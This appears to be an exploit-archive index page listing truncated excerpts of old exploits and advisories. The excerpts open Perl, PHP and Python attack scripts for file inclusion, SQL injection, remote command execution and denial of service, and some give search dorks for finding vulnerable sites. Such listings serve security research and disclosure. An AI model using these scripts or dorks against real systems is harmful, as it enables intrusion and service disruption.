WinZip FileView ActiveX controls CreateNewFolderFromName Method Buffer Overflow Vulnerability

WinZip FileView ActiveX controls CreateNewFolderFromName Method Buffer Overflow Vulnerability ------------------------------------------------------------------ SUMMARY: A vulnerability has been identified in Winzip 10.0 Build 6667,May be other version, which could be exploited by remote or local...

eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion

source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts. By combining thi...

thinkedit-rfi.txt

r0ut3r Presents... Another r0ut3r discovery! writ3r at gmail.com ThinkEdit Remote File Inclusion Exploit Software: ThinkEdit 1.9.2 Vendor: http://www.thinkedit.org/ Released: 2006/12/08 Discovered & Exploit By: r0ut3r writ3r at gmail.com Note: The information provided in this document is for...

AlberT-EasySite PSA_PATH远程文件包含漏洞

AlberT-EasySite是一款基于PHP的站点生成系统。 AlberT-EasySite在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 AlberT-EasySite没有正确地验证AES/modules/auth/phpsecurityadmin/include/logout.php文件中对PSAPATH参数的输入，允许攻击者通过包含本地或外部资源执行任意PHP代码。成功攻击要求打开了registerglobals。 AlberT AlberT-EasySite 1.0 AlberT AlberT-EasySite 0.8.12...

Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution

!/usr/bin/php //oneadmin/adminfoot.php?pathdocroot= Googledork: inurl:/oneadmin/ w4ck1ng - w4ck1ng.com / if!$argv3 die"Usage: php $argv0 host path command\n Usage Example: php $argv0 domain.com /dolphin/ whoami\n"; function send$host, $put global $data; $conn = fsockopen gethostbyname$host,"80" ;...

phpPC103RC1-rfi.txt

!/usr/bin/perl + + - - - xp10 TEAM THE BEST POLISH TEAM - - + + + - phpPC "wolf TEAM :: phpPC 1.03 Remote File Include Exploit :: by the-wolf-ksa ;- " ; $mw-geometry '500x300' ; $mw-resizable0,0; $mw-Label-text = 'phpPC 1.03 RC1 Remote File Include Exploit by the-wolf-ksa', -font = 'Verdana 7...

VistaBB <= 2.x (functions_mod_user.php) Remote Include Exploit

Exploit for unknown platform in category web applications ============================================================== VistaBB ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: email protected Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 C nukedx...

VistaBB &lt;= 2.x (functions_mod_user.php) Remote Include Exploit

No description provided by source. !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB = 2.x Remote Command Execution Exploit This exploit...

brush.txt

Description: yet another 'windows meta file' WMF denial of service exploit. System affected: + Windows XP SP2, + Windows 2003 SP1, + Windows XP SP1, + Windows XP + Windows 2003 Tech info: page fault in gdi32!CreateBrushIndirect because invalid pointer access. Incorrect short to void sign extensio...

PHPMyRing 4.2.0 - &#039;view_com.php&#039; SQL Injection

Title: PHPMyRing's viewcom.php Remote SQL injection Exploit Vendor: phpmyring webiste : http://phpmyring.sourceforge.net/ Version : Exploit writting by: Simo Ben youssef Discovered: 09 Aout 2006 Published : 10 Aout 2006 MorX Security Research Team http://www.morx.org Details: vulnerable code on...

dreamaccount.py.txt

!/usr/bin/env python DreamAccount Federico Fazzi more info see advisory. need registerglobal = On import os, sys, socket usage = "run: python %s remoteaddr remoteport remotepath remotecmd " % os.path.basenamesys.argv0 if lensys.argv \n" require$dapath . "setup.php"; includers =...

HiveMail 1.3 - &#039;addressbook.add.php&#039; Remote Code Execution

!/usr/bin/perl HiveMail = 1.3 remote command execution exploit Advisory: http://www.gulftech.org/?node=research&articleid=00098-02102006 To get the hivesession: log on hivemail with firefox then look at the hivesession number in the url. yes i know... Dork: "Already have an account?" "Enter your...

PAJAX <= 0.5.1 Remote Code Execution Exploit

Exploit for unknown platform in category web applications ============================================ PAJAX new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "connecterror\n"; while 1 print ''.$host.' '; $cmd = ; chop$cmd; last if $cmd eq 'exit'; $ajaxdata = ""id":...

ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)

!/usr/bin/perl ---------------------------------------------------- ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server Jerome Athias ---------------------------------------------------- use Net::FTP; geting data $host = @ARGV0; $port = @ARGV1; $debug = @ARGV2; $user = @ARGV3; $pass = @ARGV4;...

MiniNukeCMS.txt

--Security Report-- Advisory: MiniNuke CMS System all versions pages.asp SQL Injection vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 19/02/06 10:31 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: MiniNuke...

MyBulletinBoard (MyBB) &lt;= 1.03 Multiple SQL Injection Exploit

No description provided by source. !/bin/env perl //------------------------------------------------------------- // MyBB Forum SQL Injection Exploit .. By HACKERS PAL // Greets For Devil-00 - Abducter - Almaster - GaCkeR // Special Greets For SG SecurityGurus Team And Members //...

PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit

No description provided by source. ?php 20.05 23/10/2005 ---phpnuke78xpl.php PHPNuke 7.8 with all security fixes/patches "Downloads","WebLinks" & "YourAccount" modules SQL Injection / remote commands execution exploit yet not tested 7.9, but OK... by rgod site: http://rgod.altervista.org make the...

mybbSQL.pl.txt

!/usr/bin/perl -w use LWP::Simple; Vitem if!$ARGV0 print " MyBB Member.php SQL Injection \n"; print " Coded By \n"; print " \n"; print " + Bug By W7ED - W7EDathotmail.com \n"; print " \n"; print " Exmp:- perl file.pl mybb.net /mybb userid \n"; print " \n"; exit; my $host = 'http://'.$ARGV0; User ...

FTPshellDoS.txt

Summary: Denial of service vulnerability in FTPshell Server Version 3.38 http://www.ftpshell.com/ Details: Logging into the FTP server successfully and then closing the connection without using the QUIT command 39 times will cause the ftpshelld.exe process will die. Vulnerable Versions: FTPshell...

Remote Control Server 1.6.2 - Denial of Service

!/usr/local/bin/perl Remote Control Server DOS Exploit ------------------------------------ Infam0us Gr0up - Securiti Research Tested on Windows2000 SP4 Win NT Info: infamous.2hell.com $ARGC=@ARGV; if $ARGC !=1 print "\n"; print " Remote Control Server DOS Exploit\n"; print...